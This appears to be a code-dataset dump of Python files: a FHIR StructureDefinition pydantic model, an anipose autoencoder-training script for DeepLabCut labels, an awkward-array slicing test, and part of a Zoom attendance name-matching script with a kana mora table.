blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3dd51cde5fdbdc6321338ce9a565bb6b23112c26 | 30109f5f173f4e51a20cfcaf6ec41628b177f553 | /fhir/resources/structuredefinition.py | 56118989c2386d775da26b02b7cf0d5bf1a7f79c | [
"BSD-3-Clause"
] | permissive | arkhn/fhir.resources | 82c8f705c8f19e15621f2bb59fd17600c0ef3697 | 122e89c8599c4034bb3075b31d1a1188e377db91 | refs/heads/master | 2022-12-16T07:58:19.448071 | 2020-08-13T03:59:37 | 2020-08-13T03:59:37 | 288,683,730 | 1 | 0 | NOASSERTION | 2020-08-19T09:01:02 | 2020-08-19T09:01:01 | null | UTF-8 | Python | false | false | 23,609 | py | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/StructureDefinition
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
from typing import List as ListType
from typing import Union
from pydantic import Field
from . import backboneelement, domainresource, fhirtypes
class StructureDefinition(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Structural Definition.
A definition of a FHIR structure. This resource is used to describe the
underlying resources, data types defined in FHIR, and also for describing
extensions and constraints on resources and data types.
"""
resource_type = Field("StructureDefinition", const=True)
abstract: bool = Field(
...,
alias="abstract",
title="Whether the structure is abstract",
description=(
"Whether structure this definition describes is abstract or not - that"
" is, whether the structure is not intended to be instantiated. For "
"Resources and Data types, abstract types will never be exchanged "
"between systems."
),
# if property is element of this resource.
element_property=True,
)
abstract__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_abstract", title="Extension field for ``abstract``."
)
baseDefinition: fhirtypes.Canonical = Field(
None,
alias="baseDefinition",
title="Definition that this type is constrained/specialized from",
description=(
"An absolute URI that is the base structure from which this type is "
"derived, either by specialization or constraint."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["StructureDefinition"],
)
baseDefinition__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_baseDefinition", title="Extension field for ``baseDefinition``."
)
contact: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
# if property is element of this resource.
element_property=True,
)
context: ListType[fhirtypes.StructureDefinitionContextType] = Field(
None,
alias="context",
title="If an extension, where it can be used in instances",
description=(
"Identifies the types of resource or data type elements to which the "
"extension can be applied."
),
# if property is element of this resource.
element_property=True,
)
contextInvariant: ListType[fhirtypes.String] = Field(
None,
alias="contextInvariant",
title="FHIRPath invariants - when the extension can be used",
description=(
"A set of rules as FHIRPath Invariants about when the extension can be "
"used (e.g. co-occurrence variants for the extension). All the rules "
"must be true."
),
# if property is element of this resource.
element_property=True,
)
contextInvariant__ext: ListType[
Union[fhirtypes.FHIRPrimitiveExtensionType, None]
] = Field(
None,
alias="_contextInvariant",
title="Extension field for ``contextInvariant``.",
)
copyright: fhirtypes.Markdown = Field(
None,
alias="copyright",
title="Use and/or publishing restrictions",
description=(
"A copyright statement relating to the structure definition and/or its "
"contents. Copyright statements are generally legal restrictions on the"
" use and publishing of the structure definition."
),
# if property is element of this resource.
element_property=True,
)
copyright__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_copyright", title="Extension field for ``copyright``."
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the structure definition was "
"published. The date must change when the business version changes and "
"it must change if the status code changes. In addition, it should "
"change when the substantive content of the structure definition "
"changes."
),
# if property is element of this resource.
element_property=True,
)
date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_date", title="Extension field for ``date``."
)
derivation: fhirtypes.Code = Field(
None,
alias="derivation",
title="specialization | constraint - How relates to base definition",
description="How the type relates to the baseDefinition.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["specialization", "constraint"],
)
derivation__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_derivation", title="Extension field for ``derivation``."
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Natural language description of the structure definition",
description=(
"A free text natural language description of the structure definition "
"from a consumer's perspective."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
differential: fhirtypes.StructureDefinitionDifferentialType = Field(
None,
alias="differential",
title="Differential view of the structure",
description=(
"A differential view is expressed relative to the base "
"StructureDefinition - a statement of differences that it applies."
),
# if property is element of this resource.
element_property=True,
)
experimental: bool = Field(
None,
alias="experimental",
title="For testing purposes, not real usage",
description=(
"A Boolean value to indicate that this structure definition is authored"
" for testing purposes (or education/evaluation/marketing) and is not "
"intended to be used for genuine usage."
),
# if property is element of this resource.
element_property=True,
)
experimental__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_experimental", title="Extension field for ``experimental``."
)
fhirVersion: fhirtypes.Code = Field(
None,
alias="fhirVersion",
title="FHIR Version this StructureDefinition targets",
description=(
"The version of the FHIR specification on which this "
"StructureDefinition is based - this is the formal version of the "
"specification, without the revision number, e.g. "
"[publication].[major].[minor], which is 4.0.1. for this version."
),
# if property is element of this resource.
element_property=True,
)
fhirVersion__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_fhirVersion", title="Extension field for ``fhirVersion``."
)
identifier: ListType[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Additional identifier for the structure definition",
description=(
"A formal identifier that is used to identify this structure definition"
" when it is represented in other formats, or referenced in a "
"specification, model, design or an instance."
),
# if property is element of this resource.
element_property=True,
)
jurisdiction: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="jurisdiction",
title="Intended jurisdiction for structure definition (if applicable)",
description=(
"A legal or geographic region in which the structure definition is "
"intended to be used."
),
# if property is element of this resource.
element_property=True,
)
keyword: ListType[fhirtypes.CodingType] = Field(
None,
alias="keyword",
title="Assist with indexing and finding",
description=(
"A set of key words or terms from external terminologies that may be "
"used to assist with indexing and searching of templates nby describing"
" the use of this structure definition, or the content it describes."
),
# if property is element of this resource.
element_property=True,
)
kind: fhirtypes.Code = Field(
...,
alias="kind",
title="primitive-type | complex-type | resource | logical",
description="Defines the kind of structure that this definition is describing.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["primitive-type", "complex-type", "resource", "logical"],
)
kind__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_kind", title="Extension field for ``kind``."
)
mapping: ListType[fhirtypes.StructureDefinitionMappingType] = Field(
None,
alias="mapping",
title="External specification that the content is mapped to",
description="An external specification that the content is mapped to.",
# if property is element of this resource.
element_property=True,
)
name: fhirtypes.String = Field(
...,
alias="name",
title="Name for this structure definition (computer friendly)",
description=(
"A natural language name identifying the structure definition. This "
"name should be usable as an identifier for the module by machine "
"processing applications such as code generation."
),
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the "
"structure definition."
),
# if property is element of this resource.
element_property=True,
)
publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_publisher", title="Extension field for ``publisher``."
)
purpose: fhirtypes.Markdown = Field(
None,
alias="purpose",
title="Why this structure definition is defined",
description=(
"Explanation of why this structure definition is needed and why it has "
"been designed as it has."
),
# if property is element of this resource.
element_property=True,
)
purpose__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_purpose", title="Extension field for ``purpose``."
)
snapshot: fhirtypes.StructureDefinitionSnapshotType = Field(
None,
alias="snapshot",
title="Snapshot view of the structure",
description=(
"A snapshot view is expressed in a standalone form that can be used and"
" interpreted without considering the base StructureDefinition."
),
# if property is element of this resource.
element_property=True,
)
status: fhirtypes.Code = Field(
...,
alias="status",
title="draft | active | retired | unknown",
description=(
"The status of this structure definition. Enables tracking the life-"
"cycle of the content."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["draft", "active", "retired", "unknown"],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
title: fhirtypes.String = Field(
None,
alias="title",
title="Name for this structure definition (human friendly)",
description=(
"A short, descriptive, user-friendly title for the structure " "definition."
),
# if property is element of this resource.
element_property=True,
)
title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_title", title="Extension field for ``title``."
)
type: fhirtypes.Uri = Field(
...,
alias="type",
title="Type defined or constrained by this structure",
description=(
"The type this structure describes. If the derivation kind is "
"'specialization' then this is the master definition for a type, and "
"there is always one of these (a data type, an extension, a resource, "
"including abstract ones). Otherwise the structure definition is a "
"constraint on the stated type (and in this case, the type cannot be an"
" abstract type). References are URLs that are relative to "
'http://hl7.org/fhir/StructureDefinition e.g. "string" is a reference '
"to http://hl7.org/fhir/StructureDefinition/string. Absolute URLs are "
"only allowed in logical models."
),
# if property is element of this resource.
element_property=True,
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
url: fhirtypes.Uri = Field(
...,
alias="url",
title=(
"Canonical identifier for this structure definition, represented as a "
"URI (globally unique)"
),
description=(
"An absolute URI that is used to identify this structure definition "
"when it is referenced in a specification, model, design or an "
"instance; also called its canonical identifier. This SHOULD be "
"globally unique and SHOULD be a literal address at which at which an "
"authoritative instance of this structure definition is (or will be) "
"published. This URL can be the target of a canonical reference. It "
"SHALL remain the same when the structure definition is stored on "
"different servers."
),
# if property is element of this resource.
element_property=True,
)
url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_url", title="Extension field for ``url``."
)
useContext: ListType[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate structure definition instances."
),
# if property is element of this resource.
element_property=True,
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the structure definition",
description=(
"The identifier that is used to identify this version of the structure "
"definition when it is referenced in a specification, model, design or "
"instance. This is an arbitrary value managed by the structure "
"definition author and is not expected to be globally unique. For "
"example, it might be a timestamp (e.g. yyyymmdd) if a managed version "
"is not available. There is also no expectation that versions can be "
"placed in a lexicographical sequence."
),
# if property is element of this resource.
element_property=True,
)
version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_version", title="Extension field for ``version``."
)
class StructureDefinitionContext(backboneelement.BackboneElement):
    """If an extension, where it can be used in instances.

    Identifies the types of resource or data type elements to which the
    extension can be applied.

    Disclaimer: any field name that ends with ``__ext`` is not part of the
    FHIR resource itself; it only exists to enable the Extensibility
    feature for FHIR primitive data types.
    """

    resource_type = Field("StructureDefinitionContext", const=True)

    # FHIRPath (or element/extension) expression selecting where the
    # extension may appear; required by the FHIR spec (``...`` = mandatory).
    expression: fhirtypes.String = Field(
        ...,
        alias="expression",
        title="Where the extension can be used in instances",
        description=(
            "An expression that defines where an extension can be used in " "resources."
        ),
        # if property is element of this resource.
        element_property=True,
    )
    expression__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
        None, alias="_expression", title="Extension field for ``expression``."
    )

    # How ``expression`` should be interpreted (required code).
    type: fhirtypes.Code = Field(
        ...,
        alias="type",
        title="fhirpath | element | extension",
        description=(
            "Defines how to interpret the expression that defines what the context "
            "of the extension is."
        ),
        # if property is element of this resource.
        element_property=True,
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=["fhirpath", "element", "extension"],
    )
    type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
        None, alias="_type", title="Extension field for ``type``."
    )
class StructureDefinitionDifferential(backboneelement.BackboneElement):
    """Differential view of the structure.

    A differential view is expressed relative to the base StructureDefinition -
    a statement of differences that it applies.

    Disclaimer: any field name that ends with ``__ext`` is not part of the
    FHIR resource itself; it only exists to enable the Extensibility
    feature for FHIR primitive data types.
    """

    resource_type = Field("StructureDefinitionDifferential", const=True)

    # Required, non-empty list of element-level constraints.
    element: ListType[fhirtypes.ElementDefinitionType] = Field(
        ...,
        alias="element",
        title="Definition of elements in the resource (if no StructureDefinition)",
        description="Captures constraints on each element within the resource.",
        # if property is element of this resource.
        element_property=True,
    )
class StructureDefinitionMapping(backboneelement.BackboneElement):
    """External specification that the content is mapped to.

    An external specification that the content is mapped to.

    Disclaimer: any field name that ends with ``__ext`` is not part of the
    FHIR resource itself; it only exists to enable the Extensibility
    feature for FHIR primitive data types.
    """

    resource_type = Field("StructureDefinitionMapping", const=True)

    # Free-text notes about the mapping (optional).
    comment: fhirtypes.String = Field(
        None,
        alias="comment",
        title="Versions, Issues, Scope limitations etc.",
        description=(
            "Comments about this mapping, including version notes, issues, scope "
            "limitations, and other important notes for usage."
        ),
        # if property is element of this resource.
        element_property=True,
    )
    comment__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
        None, alias="_comment", title="Extension field for ``comment``."
    )

    # Required internal key that ElementDefinition.mapping entries refer to.
    identity: fhirtypes.Id = Field(
        ...,
        alias="identity",
        title="Internal id when this mapping is used",
        description=(
            "An Internal id that is used to identify this mapping set when specific"
            " mappings are made."
        ),
        # if property is element of this resource.
        element_property=True,
    )
    identity__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
        None, alias="_identity", title="Extension field for ``identity``."
    )

    # Human-readable name of the target specification (optional).
    name: fhirtypes.String = Field(
        None,
        alias="name",
        title="Names what this mapping refers to",
        description="A name for the specification that is being mapped to.",
        # if property is element of this resource.
        element_property=True,
    )
    name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
        None, alias="_name", title="Extension field for ``name``."
    )

    # Canonical URI of the target specification (optional).
    uri: fhirtypes.Uri = Field(
        None,
        alias="uri",
        title="Identifies what this mapping refers to",
        description=(
            "An absolute URI that identifies the specification that this mapping is"
            " expressed to."
        ),
        # if property is element of this resource.
        element_property=True,
    )
    uri__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
        None, alias="_uri", title="Extension field for ``uri``."
    )
class StructureDefinitionSnapshot(backboneelement.BackboneElement):
    """Snapshot view of the structure.

    A snapshot view is expressed in a standalone form that can be used and
    interpreted without considering the base StructureDefinition.

    Disclaimer: any field name that ends with ``__ext`` is not part of the
    FHIR resource itself; it only exists to enable the Extensibility
    feature for FHIR primitive data types.
    """

    resource_type = Field("StructureDefinitionSnapshot", const=True)

    # Required, non-empty list of fully-resolved element definitions.
    element: ListType[fhirtypes.ElementDefinitionType] = Field(
        ...,
        alias="element",
        title="Definition of elements in the resource (if no StructureDefinition)",
        description="Captures constraints on each element within the resource.",
        # if property is element of this resource.
        element_property=True,
    )
| [
"connect2nazrul@gmail.com"
] | connect2nazrul@gmail.com |
5a70b3dd55fd3d9c45bbbf134b407923549c6c38 | 50edd95cf9ea295b4216e10361a3dfc7e029a660 | /anipose/train_autoencoder.py | e5534bcc6a314c1726f5d863fc601e59da0b5da8 | [
"BSD-2-Clause"
] | permissive | goyallon/anipose | 5fc03b66b5a362d8ea151c6df4cc6049bccabb15 | 2239cd04f1e6d1f21ff62aab005ebfe6fed351c8 | refs/heads/master | 2022-11-05T06:59:14.077907 | 2020-06-15T23:39:10 | 2020-06-15T23:39:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,255 | py | #!/usr/bin/env python3
from sklearn.neural_network import MLPRegressor, MLPClassifier
import pandas as pd
import os.path
import numpy as np
from glob import glob
from ruamel.yaml import YAML
import pickle
def get_dataset_location(model_folder):
    """Return the path of the CollectedData_*.h5 labels file for the
    DeepLabCut iteration currently selected in the model's config.yaml.

    Assumes exactly one matching file exists (raises IndexError otherwise).
    """
    yaml = YAML(typ='rt')
    with open(os.path.join(model_folder, 'config.yaml'), 'r') as cfg:
        dlc_config = yaml.load(cfg)
    # DLC keeps one labels file per training iteration.
    pattern = os.path.join(
        model_folder, 'training-datasets',
        'iteration-' + str(dlc_config['iteration']),
        '*', 'CollectedData_*.h5')
    return glob(pattern)[0]
def load_pose_2d_training(fname):
    """Load DeepLabCut 2-D training labels from an HDF5 file.

    Returns an (n_frames, n_joints, 2) float array of x/y coordinates —
    with any partially-missing coordinate pair set fully to NaN — plus a
    metadata dict (bodyparts, scorer, frame index).
    """
    raw = pd.read_hdf(fname)
    scorer = raw.columns.levels[0][0]
    labeled = raw.loc[:, scorer]

    bp_level = labeled.columns.names.index('bodyparts')
    coord_level = labeled.columns.names.index('coords')  # kept for parity; unused
    bodyparts = list(labeled.columns.get_level_values(bp_level).unique())

    coords = np.array(labeled).reshape(len(labeled), len(bodyparts), 2)
    # If either x or y is non-finite, invalidate the whole pair.
    incomplete = np.any(~np.isfinite(coords), axis=2)
    coords[incomplete] = np.nan

    meta = {
        'bodyparts': bodyparts,
        'scorer': scorer,
        'index': labeled.index,
    }
    return coords, meta
def generate_training_data(scores, n_iters=10):
    """Build a denoising training set from a binary joint-score matrix.

    Each of the ``n_iters`` rounds pairs a noisy copy of ``scores`` (input
    X) with the clean ``scores`` (target y): present joints (score 1) are
    jittered around 1, missing joints around 0, values are clipped to
    [0, 1], and ~5% of entries are flipped to simulate detector mistakes.
    Returns (X, y), each of shape (n_iters * n_frames, n_joints).
    """
    inputs = []
    targets = []
    for _ in range(n_iters):
        noisy = scores.copy()
        present = noisy == 1
        noisy[present] = np.random.normal(1, 0.3, size=np.sum(present))
        noisy[~present] = np.random.normal(0, 0.3, size=np.sum(~present))
        flip = np.random.uniform(size=present.shape) < 0.05
        noisy = np.clip(noisy, 0, 1)
        noisy[flip] = 1 - noisy[flip]
        inputs.append(noisy)
        targets.append(scores)
    return np.vstack(inputs), np.vstack(targets)
def train_mlp_classifier(X, y):
    """Train a single-hidden-layer MLP to reconstruct clean scores.

    The hidden layer is as wide as the input, so the network acts as an
    autoencoder over the per-joint score vector.
    """
    n_features = X.shape[1]
    # BUG FIX: the original passed hidden_layer_sizes=(hidden) — bare
    # parentheses, i.e. a plain int, not the intended one-element tuple.
    # sklearn happens to accept a scalar, but the explicit tuple states
    # the intent (exactly one hidden layer of n_features units).
    mlp = MLPClassifier(hidden_layer_sizes=(n_features,),
                        verbose=2, max_iter=2000,
                        activation='tanh',
                        learning_rate='adaptive', solver='adam',
                        early_stopping=True)
    mlp.fit(X, y)
    return mlp
def save_mlp_classifier(mlp, fname):
    """Serialize the trained autoencoder to ``fname`` with pickle and
    report where it was written."""
    with open(fname, 'wb') as out:
        pickle.dump(mlp, out)
    print('autoencoder saved at:\n  {}'.format(fname))
def train_autoencoder(config):
    """End-to-end training: DLC labels -> presence scores -> MLP -> pickle.

    Reads the labeled dataset referenced by ``config['model_folder']`` and
    writes ``autoencoder.pickle`` into ``config['path']``.
    """
    labels_fname = get_dataset_location(config['model_folder'])
    coords, _meta = load_pose_2d_training(labels_fname)

    # Score is 1 where the joint was labeled, 0 where the label is missing.
    n_frames, n_joints, _ = coords.shape
    scores = np.ones((n_frames, n_joints), dtype='float64')
    scores[np.any(~np.isfinite(coords), axis=2)] = 0

    X, y = generate_training_data(scores)
    model = train_mlp_classifier(X, y)
    save_mlp_classifier(model, os.path.join(config['path'], 'autoencoder.pickle'))
# model_folder = '/jellyfish/research/tuthill/hand-demo-dlc-TuthillLab-2019-08-05'
# config = {'model_folder': model_folder, 'path': model_folder}
# train_autoencoder(config)
# get dataset from deeplabcut folder
# generate augmented dataset to train autoencoder
# train MLP classifier
# save result
| [
"krchtchk@gmail.com"
] | krchtchk@gmail.com |
30e78d2b6cb33880f8469deab8d18521ad8705d3 | ef76f8bcea6cc5331b4c8873704426f1aacfd60d | /tests/test_likenumpy.py | 33b1e97bd9a7e2c4fce6a68e09a09b1832715d35 | [
"BSD-3-Clause"
] | permissive | DumbMachine/awkward-array | 10a51c8ac471839e435bb471f45b6624c4f982cb | 8f54cc5d4de3bc56628676243bfe63c683667f16 | refs/heads/master | 2020-04-15T17:43:42.684480 | 2019-01-18T18:39:46 | 2019-01-18T18:39:46 | 164,884,686 | 1 | 0 | BSD-3-Clause | 2019-01-18T18:33:23 | 2019-01-09T15:06:24 | Python | UTF-8 | Python | false | false | 6,027 | py | #!/usr/bin/env python
# Copyright (c) 2018, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import numpy
import awkward
class Test(unittest.TestCase):
    def runTest(self):
        pass

    def test_likenumpy_slices(self):
        """awkward.fromiter output must match numpy under slicing and
        fancy/boolean indexing, on 2-D and 3-D arrays."""
        print()

        def check(np_arr, aw_arr, index):
            # x[a, b] is exactly x[(a, b)], so tuple indices reproduce
            # the literal subscript expressions one-for-one.
            assert np_arr[index].tolist() == aw_arr[index].tolist()

        first2 = slice(None, 2)
        mask = [True, False, True]
        index_table = [
            (first2,),
            (first2, first2),
            (first2, 2),
            (2, first2),
            (first2, [0, 1]),
            ([0, 1], first2),
            (first2, [0, 1, 2]),
            ([0, 1, 2], first2),
            ([0, 1], [0, 1]),
            ([0, 1, 2], [0, 1, 2]),
            (first2, mask),
            (mask, first2),
            (mask, mask),
        ]

        np2 = numpy.array([[1, 10, 100], [2, 20, 200], [3, 30, 300]])
        aw2 = awkward.fromiter(np2)
        assert np2.tolist() == aw2.tolist()
        for idx in index_table:
            check(np2, aw2, idx)

        np3 = numpy.array([[[1, 10, 100], [2, 20, 200], [3, 30, 300]],
                           [[4, 40, 400], [5, 50, 500], [6, 60, 600]],
                           [[7, 70, 700], [8, 80, 800], [9, 90, 900]]])
        aw3 = awkward.fromiter(np3)
        assert np3.tolist() == aw3.tolist()
        for idx in index_table:
            check(np3, aw3, idx)
        # Two-axis selections also checked with a fixed last-axis pick.
        for idx in index_table[1:]:
            check(np3, aw3, idx + (0,))
            check(np3, aw3, idx + (1,))
| [
"jpivarski@gmail.com"
] | jpivarski@gmail.com |
d63c6983f2dcdf576ef3ebfafdf14196ef632044 | c64269774427d81b474b923839c0ed24a8ac38f1 | /zoomident.py | d46f2d4485be6163432d1a911b8fb0b80d66ca34 | [
"LicenseRef-scancode-public-domain"
] | permissive | euske/python3-toys | ba6be94c61e75473426909d0a23d65b9eb54bf2a | 9945f22167e580f6e3ba1dc4a1513d25f2e6bafa | refs/heads/master | 2023-04-01T04:55:20.477855 | 2023-03-27T02:54:28 | 2023-03-27T02:54:28 | 45,541,191 | 8 | 7 | null | null | null | null | UTF-8 | Python | false | false | 20,046 | py | #!/usr/bin/env python
##
## Usage:
## $ ./zoomident.py -i meibo.csv -i extra.txt -p10:10 report.csv
##
## report.csv:
## 祐介 新山,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## 新山 (祐),,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## 99B99999 新山祐介,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## シンヤマユウスケ,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## Yusuke Shinyama,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
##
## meibo.csv:
## CS2,Dept,99B99999,新山 祐介,シンヤマ ユウスケ,,,2001/1/1,,,yusuke@example.com
##
## extra.txt:
## 99B99999 新山 祐介 しんやま
##
import sys
import csv
from datetime import datetime, time
## Mora
##
class Mora:
    """A single mora (Japanese syllable unit).

    Holds the mora's kana spellings and its romanization rules, split into
    two rule sets by prefix: '!' marks official-romanization-only spellings,
    '+' marks English-style-only spellings, and unprefixed spellings belong
    to both sets.
    """

    def __init__(self, mid, zenk, hank, zenh, *rules):
        self.mid = mid    # internal mora identifier
        self.zenk = zenk  # full-width (zenkaku) katakana
        self.hank = hank  # half-width (hankaku) katakana, or None
        self.zenh = zenh  # full-width (zenkaku) hiragana
        # Official-romanization spellings: everything not marked '+',
        # with a leading '!' stripped.
        self.roff = [r[1:] if r.startswith('!') else r
                     for r in rules if not r.startswith('+')]
        # English-style spellings: everything not marked '!',
        # with a leading '+' stripped.
        self.reng = [r[1:] if r.startswith('+') else r
                     for r in rules if not r.startswith('!')]

    def __repr__(self):
        return '<%s>' % self.mid

    def __str__(self):
        return self.zenk
## Mora Table
##
class MoraTable:
    """Static catalogue of all Japanese moras.

    Each ``Mora(...)`` entry lists: mora id, full-width katakana, half-width
    katakana (``None`` where no half-width form exists), hiragana, and the
    romanization rules consumed by ``Mora.__init__`` ('!' = official
    romanization only, '+' = English style only, ':' = match with one
    character of lookahead, see ``MoraParser.add``).
    """
    @classmethod
    def get(klass, k):
        # Resolve a mora id to its Mora object; unknown keys pass through
        # unchanged.
        return klass.KEY2MORA.get(k, k)
    MORA_NN = Mora(
        '.n', 'ン', '\uff9d', 'ん', "n'", '+n',
        'n:k', 'n:s', 'n:t', 'n:c', 'n:h', 'n:m', 'n:r', 'n:w',
        'n:g', 'n:z', 'n:d', 'n:j', 'n:b', 'n:f', 'n:p', 'm:p',
        'n:q', 'n:v', 'n:x', 'n:l')
    ALL = (
        # (symbol, zenkaku_kana, hankaku_kana, zenkaku_hira, output, input)
        MORA_NN,
        Mora('.a', 'ア', '\uff71', 'あ', 'a'),
        Mora('.i', 'イ', '\uff72', 'い', 'i', '+y'),
        Mora('.u', 'ウ', '\uff73', 'う', 'u', 'wu', '+w'),
        Mora('.e', 'エ', '\uff74', 'え', 'e'),
        Mora('.o', 'オ', '\uff75', 'お', 'o'),
        Mora('ka', 'カ', '\uff76', 'か', 'ka', '+ca'),
        Mora('ki', 'キ', '\uff77', 'き', 'ki', '+ky'),
        Mora('ku', 'ク', '\uff78', 'く', 'ku', '+k', '+c', '+q'),
        Mora('ke', 'ケ', '\uff79', 'け', 'ke'),
        Mora('ko', 'コ', '\uff7a', 'こ', 'ko'),
        Mora('sa', 'サ', '\uff7b', 'さ', 'sa'),
        Mora('si', 'シ', '\uff7c', 'し', '!si', 'shi', '+si', '+sy'),
        Mora('su', 'ス', '\uff7d', 'す', 'su', '+s'),
        Mora('se', 'セ', '\uff7e', 'せ', 'se'),
        Mora('so', 'ソ', '\uff7f', 'そ', 'so'),
        Mora('ta', 'タ', '\uff80', 'た', 'ta'),
        Mora('ti', 'チ', '\uff81', 'ち', '!ti', 'chi', 'ci', '+ch'),
        Mora('tu', 'ツ', '\uff82', 'つ', '!tu', 'tsu'),
        Mora('te', 'テ', '\uff83', 'て', 'te'),
        Mora('to', 'ト', '\uff84', 'と', 'to', '+t'),
        Mora('na', 'ナ', '\uff85', 'な', 'na'),
        Mora('ni', 'ニ', '\uff86', 'に', 'ni', '+ny'),
        Mora('nu', 'ヌ', '\uff87', 'ぬ', 'nu'),
